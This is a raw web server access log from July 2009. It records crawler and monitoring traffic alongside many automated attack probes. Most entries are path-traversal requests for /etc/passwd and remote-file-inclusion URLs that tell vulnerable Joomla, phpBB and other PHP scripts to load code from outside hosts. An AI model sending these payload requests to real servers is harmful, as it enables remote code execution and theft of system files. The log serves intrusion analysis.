72.30.161.230 - - [18/Jul/2009:03:57:28 -0400] "GET /logs/access_log.Q108031900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
221.143.51.115 - - [18/Jul/2009:03:57:29 -0400] "GET /logs/login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
72.30.161.230 - - [18/Jul/2009:03:57:31 -0400] "GET /logs/error_log.Q109060500 HTTP/1.0" 200 2740178 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [18/Jul/2009:03:57:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.161.230 - - [18/Jul/2009:03:57:33 -0400] "GET /logs/error_log.Q109060500 HTTP/1.0" 200 2740178 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.189.18.73 - - [18/Jul/2009:03:59:13 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:03:59:14 -0400] "GET /logs/access_log.Q109070600/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:03:59:14 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
151.1.153.1 - - [18/Jul/2009:04:00:16 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
211.189.18.73 - - [18/Jul/2009:04:00:18 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:00:19 -0400] "GET /logs/access_log.Q109070600/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:00:19 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:04:00:39 -0400] "GET /logs/access_log.Q109063000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.120.227.242 - - [18/Jul/2009:04:00:58 -0400] "GET /logs/access_log.Q109061300/login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
58.120.227.242 - - [18/Jul/2009:04:00:59 -0400] "GET /login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
58.120.227.242 - - [18/Jul/2009:04:01:00 -0400] "GET /logs/login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
82.195.150.228 - - [18/Jul/2009:04:01:04 -0400] "GET /logs/access_log.Q109062500/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:01:04 -0400] "GET /vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:01:04 -0400] "GET /logs/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:01:05 -0400] "GET /logs/access_log.Q109062700/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:01:10 -0400] "GET /logs/access_log.Q109062500/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.medchoicefinancial.com/ec.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:01:10 -0400] "GET /vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.medchoicefinancial.com/ec.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:01:10 -0400] "GET /logs/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.medchoicefinancial.com/ec.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:01:11 -0400] "GET /logs/access_log.Q109062700/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.medchoicefinancial.com/ec.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
122.153.28.140 - - [18/Jul/2009:04:02:11 -0400] "GET /logs/access_log.Q109052900//////?_SERVER%5BDOCUMENT_ROOT%5D]=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
122.153.28.140 - - [18/Jul/2009:04:02:12 -0400] "GET /logs/access_log.Q109052900//////?_SERVER%5BDOCUMENT_ROOT%5D]=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:04:02:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.189.18.73 - - [18/Jul/2009:04:02:36 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
211.189.18.73 - - [18/Jul/2009:04:02:36 -0400] "GET /logs/access_log.Q109062600/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
211.189.18.73 - - [18/Jul/2009:04:02:36 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
114.200.199.144 - - [18/Jul/2009:04:03:11 -0400] "GET /logs/access_log.Q109062700%20%20/components/com_forum/download.php?phpbb_root_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:03:11 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:03:11 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:03:23 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:03:23 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:03:23 -0400] "GET /logs/access_log.Q109070600%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:03:54 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:03:54 -0400] "GET /logs/access_log.Q109070600%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:03:54 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:04:11 -0400] "GET /logs/access_log.Q109052700%20%20/components/com_forum/download.php?phpbb_root_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:04:27 -0400] "GET /logs/access_log.Q109060400%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:04:54 -0400] "GET /logs/access_log.Q109062200/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
211.189.18.73 - - [18/Jul/2009:04:04:57 -0400] "GET /logs/access_log.Q109060400%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
114.4.8.14 - - [18/Jul/2009:04:05:34 -0400] "GET /logs/access_log.Q109062500/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
82.195.150.228 - - [18/Jul/2009:04:05:34 -0400] "GET /logs/access_log.Q109052600/?REX[INCLUDE_PATH]=http://www.medchoicefinancial.com/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:05:34 -0400] "GET /?REX[INCLUDE_PATH]=http://www.medchoicefinancial.com/ec.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:05:34 -0400] "GET /logs/access_log.Q109052600/?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
114.4.8.14 - - [18/Jul/2009:04:05:34 -0400] "GET /vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
82.195.150.228 - - [18/Jul/2009:04:05:34 -0400] "GET /logs/?REX[INCLUDE_PATH]=http://www.medchoicefinancial.com/ec.txt? HTTP/1.1" 200 9994 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:05:34 -0400] "GET /?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:05:35 -0400] "GET /logs/?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 9994 "-" "libwww-perl/5.803"
114.4.8.14 - - [18/Jul/2009:04:05:35 -0400] "GET /logs/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
114.4.8.14 - - [18/Jul/2009:04:05:40 -0400] "GET /logs/access_log.Q109062700/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:05:48 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:05:48 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:05:50 -0400] "GET /logs/access_log.Q109062500/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:05:54 -0400] "GET /logs/access_log.Q109062600/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
82.195.150.228 - - [18/Jul/2009:04:05:55 -0400] "GET /logs/access_log.Q109052800/?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:05:55 -0400] "GET /logs/access_log.Q109052800/?REX[INCLUDE_PATH]=http://www.medchoicefinancial.com/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
114.200.199.144 - - [18/Jul/2009:04:06:02 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:06:02 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:06:03 -0400] "GET /logs/access_log.Q109060100/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.15.55.45 - - [18/Jul/2009:04:06:09 -0400] "GET /logs/access_log.Q109062500/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
122.153.28.140 - - [18/Jul/2009:04:06:09 -0400] "GET /logs/access_log.Q109052800//////?_SERVER%5BDOCUMENT_ROOT%5D]=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:06:09 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:06:09 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:06:09 -0400] "GET /logs/access_log.Q109062500/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:06:10 -0400] "GET /logs/access_log.Q109062600/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.15.55.45 - - [18/Jul/2009:04:06:10 -0400] "GET /vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:04:06:11 -0400] "GET /logs/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.803"
114.200.199.144 - - [18/Jul/2009:04:06:12 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:06:12 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:06:12 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
211.15.55.45 - - [18/Jul/2009:04:06:14 -0400] "GET /logs/access_log.Q109062700/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
211.189.18.73 - - [18/Jul/2009:04:06:20 -0400] "GET /logs/access_log.Q109062500/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.itechwon.co.kr//bbs/include/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
212.193.229.157 - - [18/Jul/2009:04:06:28 -0400] "GET /logs/access_log.Q109062500/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
212.193.229.157 - - [18/Jul/2009:04:06:28 -0400] "GET /vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
114.200.199.144 - - [18/Jul/2009:04:06:28 -0400] "GET /logs/access_log.Q109061900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.15.55.45 - - [18/Jul/2009:04:06:28 -0400] "GET /logs/access_log.Q109062500/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:04:06:30 -0400] "GET /vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:04:06:31 -0400] "GET /logs/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.803"
212.193.229.157 - - [18/Jul/2009:04:06:33 -0400] "GET /logs/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
211.15.55.45 - - [18/Jul/2009:04:06:33 -0400] "GET /logs/access_log.Q109062700/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
212.193.229.157 - - [18/Jul/2009:04:06:34 -0400] "GET /logs/access_log.Q109062700/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
114.200.199.144 - - [18/Jul/2009:04:06:55 -0400] "GET /logs/access_log.Q109062300/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:04:07:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.4.8.14 - - [18/Jul/2009:04:07:44 -0400] "GET /logs/access_log.Q109052600/?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
114.4.8.14 - - [18/Jul/2009:04:07:45 -0400] "GET /?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
114.4.8.14 - - [18/Jul/2009:04:07:46 -0400] "GET /logs/?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 9994 "-" "libwww-perl/5.79"
211.15.55.45 - - [18/Jul/2009:04:07:55 -0400] "GET /logs/access_log.Q109052600/?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:04:07:55 -0400] "GET /logs/access_log.Q109052600/?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:04:07:55 -0400] "GET /?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:04:07:56 -0400] "GET /?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:04:07:56 -0400] "GET /logs/?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 9994 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:04:07:57 -0400] "GET /logs/?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 9994 "-" "libwww-perl/5.803"
83.16.182.130 - - [18/Jul/2009:04:08:01 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
83.16.182.130 - - [18/Jul/2009:04:08:01 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:04:08:20 -0400] "GET /logs/access_log.Q109052800/?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:04:08:20 -0400] "GET /logs/access_log.Q109052800/?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
114.4.8.14 - - [18/Jul/2009:04:08:23 -0400] "GET /logs/access_log.Q109052800/?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
213.195.69.64 - - [18/Jul/2009:04:08:24 -0400] "GET /logs/access_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.thebalvenie.com//files/r0x-id.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
213.195.69.64 - - [18/Jul/2009:04:08:25 -0400] "GET /logs/access_log.Q109070200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.thebalvenie.com//files/r0x-id.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
216.117.172.131 - - [18/Jul/2009:04:08:31 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:04:08:31 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:04:08:31 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:04:08:32 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:04:08:32 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:04:08:32 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:04:08:58 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:04:09:00 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:09:13 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:09:32 -0400] "GET /logs/access_log.Q109062300%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:09:45 -0400] "GET /logs/access_log.Q109060100%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
125.245.146.253 - - [18/Jul/2009:04:09:49 -0400] "GET /logs/access_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.thebalvenie.com//files/r0x-id.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.65"
114.200.199.144 - - [18/Jul/2009:04:10:06 -0400] "GET /logs/access_log.Q109061900%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
212.193.229.157 - - [18/Jul/2009:04:10:07 -0400] "GET /logs/access_log.Q109052600/?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
216.117.172.131 - - [18/Jul/2009:04:10:07 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
